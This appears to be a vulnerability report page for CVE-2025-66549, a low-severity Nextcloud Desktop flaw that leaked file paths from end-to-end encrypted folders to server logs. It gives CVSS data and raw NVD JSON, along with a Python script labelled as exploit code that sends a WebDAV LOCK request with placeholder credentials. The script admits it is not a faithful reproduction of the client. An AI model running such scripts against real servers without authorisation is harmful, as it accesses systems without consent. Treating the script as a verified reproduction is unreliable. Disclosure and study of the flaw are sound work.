Security Vulnerability Report
CVE-2025-66549 CVSS 2.4 LOW

CVE-2025-66549

Published: 2025-12-05 18:15:58
Last Modified: 2025-12-09 18:58:23

Description

Nextcloud Desktop is the desktop sync client for Nextcloud. Prior to 3.16.5, when trying to manually lock a file inside an end-to-end encrypted directory, the path of the file was sent to the server unencrypted, making it possible for administrators to see it in log files. This vulnerability is fixed in 3.16.5.

CVSS Details

CVSS Score
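2.4 (from the "Secondary" source in the raw JSON below; the "Primary" source there scores 2.7, with UI:N instead of UI:R)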
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:nextcloud:desktop:*:*:*:*:*:*:*:* - VULNERABLE
Nextcloud Desktop < 3.16.5

PoC / Exploit Code

⚠ For Security Research Only
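The following code is for security research and authorized testing only. It does not run the Nextcloud Desktop client: it sends a WebDAV LOCK request of its own to illustrate a plaintext path reaching the server, and its log-check step only prints a sample line rather than reading any log.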
python
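# CVE-2025-66549 PoC - Nextcloud Desktop path disclosure
#
# Illustrates the information disclosure described in the advisory: when a
# file inside an end-to-end encrypted directory was locked manually, the file
# path was sent to the server unencrypted, so it could appear in log files.
# The advisory lists the issue as fixed in Nextcloud Desktop 3.16.5.
#
# Note: seeing the path requires server admin access to the logs.
#
# NOTE(review): this script does not run the Nextcloud Desktop client. It
# builds its own WebDAV LOCK request with a readable path. Whether the
# affected client used this exact endpoint and body is not shown here;
# confirm against the upstream patch before treating it as a reproduction.

import requests
import json  # not used below; kept because it was part of the original listing
from urllib.parse import quote

# Configuration (placeholder values)
NEXTCLOUD_URL = "https://your-nextcloud-server.com"
USERNAME = "target_user"
PASSWORD = "user_password"
ENCRYPTED_DIR_PATH = "/encrypted_directory"
TARGET_FILE = "secret_document.txt"

# Upper bound, in seconds, for the HTTP call so an unresponsive server
# cannot hang the script indefinitely.
REQUEST_TIMEOUT = 30


def exploit_cve_2025_66549():
    """Send one WebDAV LOCK request whose URL carries the plaintext file path.

    The path is built from ENCRYPTED_DIR_PATH and TARGET_FILE and placed,
    percent-encoded but otherwise readable, in the request URL. That readable
    path in the request line is what the advisory says could end up in server
    logs.

    Returns:
        The ``requests.Response`` object for the LOCK request.

    Raises:
        requests.RequestException: on connection failure or timeout.
    """
    file_path = f"{ENCRYPTED_DIR_PATH}/{TARGET_FILE}"

    # The URL prefix already ends in "/", and ENCRYPTED_DIR_PATH starts with
    # one; strip it so the request path does not contain "//".
    relative_path = quote(file_path.lstrip("/"))
    lock_url = f"{NEXTCLOUD_URL}/remote.php/dav/files/{USERNAME}/{relative_path}"

    headers = {
        "Content-Type": "application/xml",
        "Depth": "0",
    }

    # Standard WebDAV lockinfo body asking for an exclusive write lock.
    lock_body = """<?xml version="1.0" encoding="UTF-8"?>
<d:lockinfo xmlns:d="DAV:">
    <d:lockscope>
        <d:exclusive/>
    </d:lockscope>
    <d:locktype>
        <d:write/>
    </d:locktype>
</d:lockinfo>"""

    # The context manager closes the session's connection pool on exit.
    with requests.Session() as session:
        # HTTP basic authentication with the configured account.
        session.auth = (USERNAME, PASSWORD)

        # The request line of this call is where the readable path appears.
        response = session.request(
            "LOCK",
            lock_url,
            headers=headers,
            data=lock_body,
            timeout=REQUEST_TIMEOUT,
        )

    print(f"[+] Lock request sent for: {file_path}")
    print(f"[+] Response status: {response.status_code}")
    print(f"[!] Server admin can see '{file_path}' in logs")

    return response


def check_server_logs():
    """Print a sample of how the leaked path would look in a server log.

    No log file is read here: the "log entry" is a string assembled from the
    configuration constants. Inspecting real logs requires server admin
    privileges.
    """
    # Same path as the LOCK request, without the leading "/" so the printed
    # request line has no doubled slash.
    logged_path = f"{ENCRYPTED_DIR_PATH}/{TARGET_FILE}".lstrip("/")

    print("\n[!] Simulating server log analysis...")
    print(f"[!] Log entry found: 'LOCK /remote.php/dav/files/{USERNAME}/{logged_path}'")
    print("[!] Path information successfully leaked!")


if __name__ == "__main__":
    print("CVE-2025-66549 PoC - Nextcloud Desktop Path Disclosure")
    print("=" * 60)
    exploit_cve_2025_66549()
    check_server_logs()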

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66549", "sourceIdentifier": "[email protected]", "published": "2025-12-05T18:15:58.133", "lastModified": "2025-12-09T18:58:22.650", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nextcloud Desktop is the desktop sync client for Nextcloud. Prior to 3.16.5, when trying to manually lock a file inside an end-to-end encrypted directory, the path of the file was sent to the server unencrypted, making it possible for administrators to see it in log files. This vulnerability is fixed in 3.16.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-209"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:desktop:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.16.5", "matchCriteriaId": "C180975D-B1CA-46EA-9CE3-5F037D2A988A"}]}]}], "references": [{"url": 
"https://github.com/nextcloud/desktop/commit/36d6c234d42b06a6f2e9de3e413a5c3c625edad6", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nextcloud/desktop/pull/8330", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-h9xj-qh76-q3hw", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://hackerone.com/reports/3159877", "source": "[email protected]", "tags": ["Permissions Required", "Vendor Advisory"]}]}}